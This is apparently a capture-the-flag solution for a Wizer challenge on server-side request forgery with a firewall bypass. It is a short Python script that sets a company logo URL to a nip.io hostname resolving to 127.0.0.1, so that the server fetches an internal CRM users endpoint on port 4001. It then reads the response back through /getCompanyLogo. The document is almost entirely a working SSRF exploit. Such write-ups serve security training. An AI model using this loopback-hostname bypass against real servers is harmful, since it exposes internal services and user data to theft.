Wizer - Challenge 24 - SSRF with WAF bypass

Exploit

import requests

url = "https://chal24-nfjkvd7.vercel.app"


# /getCompanyLogo


r = requests.post(url + "/setCompanyLogo", json={
    "companyId": "abababab-abab-0aba-Abab-abababababab",
    "imageUrl": "http://customer2-app-127-0-0-1.nip.io:4001/CRMUsers"
})


print(r.text)



r = requests.post(url + "/getCompanyLogo", json={
    "companyId": "abababab-abab-0aba-Abab-abababababab"
})


print(r.text)